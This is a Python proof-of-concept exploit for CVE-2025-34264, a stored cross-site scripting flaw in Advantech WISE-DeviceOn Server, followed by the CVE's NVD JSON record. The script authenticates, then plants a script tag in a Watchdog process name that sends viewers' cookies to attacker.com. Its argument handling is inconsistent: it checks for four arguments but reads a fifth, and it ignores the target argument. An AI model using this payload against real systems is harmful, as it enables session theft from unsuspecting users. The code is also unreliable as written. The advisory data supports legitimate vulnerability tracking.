CVE-2025-34264

#!/usr/bin/env python3 # CVE-2025-34264 PoC - Advantech WISE-DeviceOn Server Stored XSS # Authenticated Stored XSS via Software Watchdog Process Name import requests import json import sys TARGET_URL = "https://target-server.com" API_ENDPOINT = "/rmm/v1/dog/{agentId}" LOGIN_URL = f"{TARGET_URL}/api/auth/login" def login(username, password): """Authenticate and get session token""" session = requests.Session() login_data = { "username": username, "password": password } response = session.post(LOGIN_URL, json=login_data, verify=False) if response.status_code == 200: return session, response.json().get('token') return None, None def inject_xss_payload(session, agent_id, token): """Inject malicious XSS payload into Software Watchdog process name""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # XSS payload - steals cookies when viewed xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' payload = { "settings": [ { "processName": xss_payload, "monitoringEnabled": True, "action": "alert" } ] } endpoint = f"{TARGET_URL}{API_ENDPOINT.format(agentId=agent_id)}" response = session.put(endpoint, headers=headers, json=payload) return response.status_code == 200 def main(): if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <agent_id>") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] agent_id = sys.argv[4] print(f"[*] Authenticating to {target}...") session, token = login(username, password) if not token: print("[-] Authentication failed") sys.exit(1) print(f"[+] Authentication successful") print(f"[*] Injecting XSS payload for agent: {agent_id}") if inject_xss_payload(session, agent_id, token): print(f"[+] XSS payload injected successfully") print(f"[+] Payload will execute when users view Software Watchdog rules") else: print("[-] Failed to inject payload") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-34264", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:56.287", "lastModified": "2025-12-17T17:15:49.783", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/dog/{agentId} endpoint. When an authenticated user adds or edits Software Watchdog process rules for an agent, the monitored process name is stored in the settings array and later rendered in the Software Watchdog UI without proper HTML sanitation. An attacker can inject malicious script into the process name, which is then executed in the browser context of users who view or interact with the affected rules, potentially enabling session compromise and unauthorized actions as the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-dog-agentid", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}